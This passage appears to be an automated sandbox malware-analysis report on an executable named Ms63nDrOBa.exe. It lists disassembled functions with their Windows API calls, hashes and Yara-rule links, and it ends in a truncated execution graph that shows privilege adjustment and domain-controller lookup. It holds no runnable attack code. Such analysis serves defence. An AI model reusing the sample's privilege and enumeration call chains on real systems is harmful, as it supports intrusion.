                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: de7853213b54b41e4d82286969a45229422243a67b8734ea48bfba129f49795d
                                                  • Instruction ID: 81d9f022906ee6244d37cab0c0f29790f3f95abc113fce67048acd2dff417476
                                                  • Opcode Fuzzy Hash: de7853213b54b41e4d82286969a45229422243a67b8734ea48bfba129f49795d
                                                  • Instruction Fuzzy Hash: 8B212672904119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0CB789D81DB98
                                                  Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E56
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                  • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                  • Instruction ID: ae55cc3b281789b51300203e9483e2b03caeed801d822a8147b49045e961ec64
                                                  • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                  • Instruction Fuzzy Hash: F4017571954240EFEB015BB4AE99ADD3FB4AF15301F10497AF141B61E2CAB904449B2C
                                                  Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: c2490f809f288260d3854a97f2c9280dc6f84d52f63112501a652163611abe32
                                                  • Instruction ID: 5d336d63bea0f4dd646979e45c63d0f3d2888182fff20de36e63ae33d1796f08
                                                  • Opcode Fuzzy Hash: c2490f809f288260d3854a97f2c9280dc6f84d52f63112501a652163611abe32
                                                  • Instruction Fuzzy Hash: 2A21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                  Function 00404D60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E01
                                                  • wsprintfW.USER32 ref: 00404E0A
                                                  • SetDlgItemTextW.USER32(?,007A1748), ref: 00404E1D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                                  • Instruction ID: a0af56433f9d431f5046a9fb23145e7ed032e621b14740f85a591f17ba678af7
                                                  • Opcode Fuzzy Hash: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                                  • Instruction Fuzzy Hash: 6211E773A041283BDB1055ADEC45EAE369CDF86334F254237FA25F21D1EA78CC2182E8
                                                  Function 00405E03 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405E09
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405E13
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E25
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E03
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3936084776
                                                  • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction ID: 4e7d22dde89eb6c6e58e9bdf2ba0d87ed645a023497c505cae90b6f2f3d33009
                                                  • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction Fuzzy Hash: E4D05E31101534AAC211AB48AC04CDB62ACAF46308342403AF541B60A9D7785A5186ED
                                                  Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                  • GetTickCount.KERNEL32 ref: 0040304F
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                  • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: ca2d4b092798976e8b8a2b9fdb12b7f7a1786ddd6dd9d0f4e36fae50c1a32754
                                                  • Instruction ID: b3f6d95266cfacf47387896993e225006fc9e276d4c6cccc21fcd3db6f14a0d4
                                                  • Opcode Fuzzy Hash: ca2d4b092798976e8b8a2b9fdb12b7f7a1786ddd6dd9d0f4e36fae50c1a32754
                                                  • Instruction Fuzzy Hash: A0F05E70406621AFC6606F90BE08A9B7A68FB45B62B45843BF145F11E8CB3C48818B9D
                                                  Function 0040552D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 0040555C
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004055AD
                                                    • Part of subcall function 004044FF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404511
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                                  • Instruction ID: 2594d1478f304c6df33f9b27245b4e56ea2549959463d6621d9ed09538c1d2b9
                                                  • Opcode Fuzzy Hash: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                                  • Instruction Fuzzy Hash: 6C017C71100608BBEF219F15DD80A9B3B27EB88750F104037FA05B61D5C73E9D919E6D
                                                  Function 00403B71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B49,00403A5F,?,?,00000008,0000000A,0000000C), ref: 00403B8B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00403B92
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B71
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3936084776
                                                  • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                                  • Instruction ID: 86827d460d6d0210cfbc43ab248bfd1705f6cbab4bd02b4ce4b4e0dc829d3a13
                                                  • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                                  • Instruction Fuzzy Hash: 2EE012334012305BC6215F56ED04B5AB778AF55B26F09813FE940BB26287786C438FD8
                                                  Function 00405E4F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ms63nDrOBa.exe,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 00405E55
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ms63nDrOBa.exe,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 00405E65
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3125694417
                                                  • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction ID: 4264e746bbe9179bf63afe9cfc5b53a917ba9e4059aba7f94742f87ad442e0a4
                                                  • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction Fuzzy Hash: 73D0A7B3400930DAC312A704ED00D9F73ECEF5234474A4466E881A7169D7785E8186EC
                                                  Function 00405F89 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FB1
                                                  • CharNextA.USER32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FC2
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                  • Instruction ID: 8db07108f343804323cb09528c583574f267d9896fc780fa7d439bc94861dd43
                                                  • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                  • Instruction Fuzzy Hash: 1EF09631104519FFCB029FA5DE00D9EBBA8EF45350B2540B9F840F7250D678EE019BA9

                                                  Execution Graph

                                                  Execution Coverage:4.6%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:36%
                                                  Total number of Nodes:1763
                                                  Total number of Limit Nodes:58
                                                  execution_graph 41131 7ff7c1723fd8 AdjustTokenPrivileges 41132 7ff7c172400a GetLastError 41131->41132 41133 7ff7c1724023 GetLastError CloseHandle 41131->41133 41132->41133 41134 7ff7c1724014 CloseHandle 41132->41134 41135 7ff7c1724037 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41133->41135 41134->41135 41136 7ff7c1724424 41135->41136 41144 7ff7c17241d3 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41135->41144 41181 7ff7c172441e 41135->41181 41246 7ff7c1713f80 41135->41246 41139 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41136->41139 41137 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41137->41136 41142 7ff7c172442a 41139->41142 41140 7ff7c1724105 41143 7ff7c1713f80 35 API calls 41140->41143 41141 7ff7c1724314 41145 7ff7c1724331 41141->41145 41182 7ff7c173e4b0 41141->41182 41149 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41142->41149 41154 7ff7c1724135 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41143->41154 41146 7ff7c173e4b0 91 API calls 41144->41146 41148 7ff7c1724268 41144->41148 41155 7ff7c1724356 41144->41155 41150 7ff7c173e4b0 91 API calls 41145->41150 41153 7ff7c1724352 41145->41153 41145->41155 41146->41144 41148->41141 41152 7ff7c173e4b0 91 API calls 41148->41152 41148->41155 41151 7ff7c1724430 41149->41151 41150->41153 41152->41148 41153->41155 41260 7ff7c172a350 41153->41260 41154->41142 41154->41144 41159 7ff7c17243dd 41154->41159 41430 7ff7c1742180 41155->41430 41439 7ff7c17488fc 41159->41439 41181->41137 41183 7ff7c173e4f6 ctype 41182->41183 41184 7ff7c173e50c ConvertStringSidToSidW 41183->41184 41185 7ff7c173e51b 41184->41185 41194 7ff7c173e53b 41184->41194 41507 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41185->41507 41187 7ff7c173e525 LocalFree 41199 7ff7c173ebc1 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41187->41199 41189 7ff7c1742180 _handle_error 8 API calls 41191 7ff7c173ebd4 41189->41191 41191->41145 41192 7ff7c1713f80 35 API calls 41193 7ff7c173e74b 41192->41193 41473 7ff7c1714750 41193->41473 41196 7ff7c1713f80 35 API calls 41194->41196 41216 7ff7c173e6a7 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41194->41216 41242 7ff7c173e5d7 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41194->41242 41211 7ff7c173e610 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41196->41211 41197 7ff7c173e759 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41200 7ff7c173ebfa 41197->41200 41215 7ff7c173e7e9 41197->41215 41508 7ff7c1740c18 41197->41508 41198 7ff7c173ec18 41202 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41198->41202 41199->41189 41209 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41200->41209 41210 7ff7c173ec1e 41202->41210 41203 7ff7c173ebf4 41532 7ff7c1709910 41203->41532 41204 7ff7c173ebef 41206 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41204->41206 41206->41203 41207 7ff7c173ec12 41212 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41207->41212 41213 7ff7c173ec00 41209->41213 41211->41203 41211->41207 41214 7ff7c1713f80 35 API calls 41211->41214 41212->41198 41219 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41213->41219 41214->41216 41236 7ff7c173e981 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41215->41236 41518 7ff7c1709520 41215->41518 41216->41207 41444 7ff7c173f9c0 41216->41444 41222 7ff7c173ec06 41219->41222 41220 7ff7c173e839 41223 7ff7c1709520 35 API calls 41220->41223 41225 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41222->41225 41226 7ff7c173e847 DsGetDcNameW 41223->41226 41224 7ff7c173e9ef 41229 7ff7c173ea1d 41224->41229 41230 7ff7c173ea02 41224->41230 41224->41242 41227 7ff7c173ec0c 41225->41227 41231 7ff7c173e89e 41226->41231 41238 7ff7c173e912 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41226->41238 41234 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41227->41234 41233 7ff7c1713f80 35 API calls 41229->41233 41229->41242 41232 7ff7c173f3c0 46 API calls 41230->41232 41240 7ff7c1713f80 35 API calls 41231->41240 41232->41242 41235 7ff7c173ea4c 41233->41235 41234->41207 41237 7ff7c173f3c0 46 API calls 41235->41237 41236->41227 41480 7ff7c173f3c0 41236->41480 41237->41242 41238->41213 41238->41236 41239 7ff7c1713f80 35 API calls 41238->41239 41239->41236 41241 7ff7c173e8bc 41240->41241 41531 7ff7c171eaf0 8 API calls 3 library calls 41241->41531 41242->41198 41242->41199 41242->41204 41242->41207 41242->41222 41242->41227 41244 7ff7c173e901 41244->41238 41245 7ff7c173e90b NetApiBufferFree 41244->41245 41245->41238 41247 7ff7c1713fb0 ctype 41246->41247 41253 7ff7c1713ff9 41246->41253 41247->41140 41248 7ff7c1714110 41583 7ff7c1713e30 33 API calls 41248->41583 41250 7ff7c171401b 41252 7ff7c171410a Concurrency::cancel_current_task 41250->41252 41255 7ff7c17421d4 std::_Facet_Register 5 API calls 41250->41255 41252->41248 41253->41248 41253->41250 41253->41252 41254 7ff7c1714094 41253->41254 41256 7ff7c17421d4 std::_Facet_Register 5 API calls 41254->41256 41259 7ff7c1714081 Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41254->41259 41255->41259 41256->41259 41257 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41258 7ff7c1714109 41257->41258 41258->41252 41259->41257 41261 7ff7c172a42e 41260->41261 41584 7ff7c171c460 41261->41584 41264 7ff7c1740c18 13 API calls 41265 7ff7c172a44a 41264->41265 41590 7ff7c17344d0 41265->41590 41268 7ff7c172a5e9 41270 